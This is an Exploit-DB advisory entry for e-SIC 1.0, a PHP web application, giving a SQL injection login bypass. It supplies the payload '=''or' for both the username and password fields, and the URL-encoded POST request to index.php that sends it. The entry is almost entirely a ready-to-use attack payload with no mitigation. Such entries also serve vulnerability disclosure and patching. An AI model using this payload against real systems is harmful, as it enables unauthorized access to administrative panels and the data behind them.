EDB-ID: 42980 | Author: Elber Tavares | Published: 2017-10-12 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: | Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
windows 7, 8.1, 10 - Firefox# Download
More informations:
The vulnerability is in the login area of e-sic,
where we can enter the panel only using some parameters such as
username and password
Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
POST: http://vulnsite/esic/index/index.php
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar